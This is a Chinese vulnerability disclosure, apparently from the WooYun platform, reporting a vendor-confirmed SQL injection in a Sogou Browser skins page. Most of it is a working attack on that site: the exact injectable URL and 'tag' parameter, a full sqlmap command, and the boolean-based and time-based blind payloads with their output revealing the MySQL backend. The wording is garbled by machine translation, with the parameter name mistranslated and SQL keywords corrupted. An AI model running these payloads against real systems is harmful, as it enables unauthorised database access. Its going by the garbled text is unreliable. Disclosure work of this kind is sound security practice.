漏洞标题 搜狗浏览器官网存在SQL注入漏洞 相关制造商 搜狗 漏洞作者 猪人 提交时间 2016-05-10 00: 36 公共时间 2016-06-28 08: 30 漏洞类型 SQL注入漏洞 危险等级 高 自我评估等级 15 漏洞状态 制造商已确认 标签标签 漏洞详细信息 ＃1漏洞网站 http://ie.sogou.com/ ＃2注射点 http://ie.sogou.com/skins/index.php?route=theme/theme/getRelatedThemes&tid=52975&tag=70,11743,11950 ＃3注射参数 唐 漏洞证明： Python sqlmap.py -u'http://ie.sogou.com/skins/index.php?route=theme/theme/getRelatedThemes&tid=52975&tag=70,11743,11950'-p tag Sqlmap使用总共0个HTTP（s）请求:标识了以下注入点 --- 参数:标签（GET） 输入:基于布尔值的盲 标题: AND基于布尔的盲 - WHERE或H * ING子句 有效载荷: route=theme/theme/getRelatedThemes＆amp; tid=52975＆amp; tag=70,11743,11950）AND 7211=7211 AND（7361=7361 输入:和/或基于时间的盲 标题: MySQL＆gt; 5.0.11 AND基于时间的盲人 有效载荷: route=theme/theme/getRelatedThemes＆amp; tid=52975＆amp; tag=70,11743,11950）AND SLEEP（5）AND（9120=9120 --- [23: 41: 53] [INFO]后端DBMS是MySQL 后端DBMS: MySQL 5.0.11 用户: setool *** 修理计划： 过滤 版权声明：转载请注明出处猪猪人@乌云